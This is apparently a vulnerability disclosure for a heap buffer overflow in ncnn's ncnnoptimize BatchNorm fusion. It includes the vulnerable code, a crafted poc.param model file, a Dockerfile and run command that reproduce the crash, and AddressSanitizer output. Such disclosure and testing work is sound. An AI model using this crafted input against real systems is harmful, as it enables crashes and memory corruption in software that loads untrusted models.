Heap Buffer Overflow in BatchNorm Fusion
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: tools/ncnnoptimize.cpp:216 in NetOptimize::fuse_convolution_batchnorm
Sanitizer verdict: heap-buffer-overflow
Summary
ncnnoptimize's Convolution+BatchNorm fusion trusts the BatchNorm layer's declared channels as the loop bound while writing into the convolution's bias_data, which was sized from the convolution's own num_output. A model that declares num_output=1 on the convolution and channels=100 on the following BatchNorm makes the fusion read and write 100 floats into a one-element bias buffer, crashing the optimizer before shape inference even starts. The entry point is tools/ncnnoptimize, which reaches the fusion at tools/ncnnoptimize.cpp:2805 immediately after loading the attacker's .param/.bin.
Detail
The untrusted fields are the convolution's num_output / bias_term / weight_data_size (parameter keys 0, 5, 6) and the BatchNorm's channels (key 0). The two layers are matched only by producer/consumer topology — layers[j]->bottoms[0] == top_blob_index — and the fusion never compares their channel counts:
// tools/ncnnoptimize.cpp:180
int channels = batchnorm->channels;
float eps = batchnorm->eps;
// tools/ncnnoptimize.cpp:204
const int weight_per_outch = convolution->weight_data_size / channels;
float* weight = convolution->weight_data;
float* bias = convolution->bias_data;
for (int i = 0; i < channels; i++)
{
float* conv_weight_outch = weight + weight_per_outch * i;
for (int j = 0; j < weight_per_outch; j++)
{
conv_weight_outch[j] *= b[i];
}
bias[i] = bias[i] * b[i] + a[i];
}
convolution->bias_data was allocated by Convolution::load_model with exactly num_output entries (the fallback at line 200 also uses channels, but only when bias_term == 0). Here bias_term is 1, so the loaded one-element buffer is used, and bias[i] is both read and written for i up to channels - 1.
The PoC declares Convolution conv 1 1 data convout 0=1 1=1 5=1 6=1 followed by BatchNorm bn 1 1 convout out 0=100 1=0.001, with crafted.bin supplying one weight, one bias, and the four 100-element BatchNorm arrays. Convolution::load_model calls ModelBinFromDataReader::load(1, 1), giving the 84-byte block in the report — 4 usable bytes, cstep padding to 16, a 4-byte refcount and the 64-byte NCNN_MALLOC_OVERREAD pad. The fusion loop then runs i from 0 to 99. Indices 1..20 quietly overwrite the padding and the Mat refcount; bias[21] lands at byte offset 84, exactly one past the end of the region, and AddressSanitizer terminates the tool. weight_per_outch is computed as 1 / 100 == 0, so the weight loop contributes no writes in this configuration; raising weight_data_size turns the same unchecked channels into an out-of-bounds write on weight_data as well.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-overflow-in-batchnorm-fusion && cd ncnn-poc-heap-buffer-overflow-in-batchnorm-fusion
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'EOF'
7767517
3 3
Input data 0 1 data
Convolution conv 1 1 data convout 0=1 1=1 5=1 6=1
BatchNorm bn 1 1 convout out 0=100
EOF
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
fuse_convolution_batchnorm conv bn
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50e000000154 at pc 0x6327bb37e8f7 bp 0x7ffd22c0a1a0 sp 0x7ffd22c0a190
READ of size 4 at 0x50e000000154 thread T0
#0 0x6327bb37e8f6 in NetOptimize::fuse_convolution_batchnorm() /ncnn/tools/ncnnoptimize.cpp:216
#1 0x6327bb3c6cff in main /ncnn/tools/ncnnoptimize.cpp:2805
#2 0x78fe540641c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#3 0x78fe5406428a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#4 0x6327bb346624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x50e000000154 is located 0 bytes after 84-byte region [0x50e000000100,0x50e000000154)
allocated by thread T0 here:
#0 0x78fe546ddf1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x6327bb415bc5 in fastMalloc /ncnn/src/allocator.h:62
#2 0x6327bb415bc5 in ncnn::Mat::create(int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:331
#3 0x6327bb44ac1a in ncnn::ModelBinFromDataReader::load(int, int) const /ncnn/src/modelbin.cpp:309
#4 0x6327bb67564c in ncnn::Convolution::load_model(ncnn::ModelBin const&) /ncnn/src/layer/convolution.cpp:69
#5 0x6327bb4b2a84 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2080
#6 0x6327bb3c6c34 in main /ncnn/tools/ncnnoptimize.cpp:2793
#7 0x78fe540641c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#8 0x78fe5406428a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#9 0x6327bb346624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/tools/ncnnoptimize.cpp:216 in NetOptimize::fuse_convolution_batchnorm()
Credit
Zheng Yu @ DepthFirst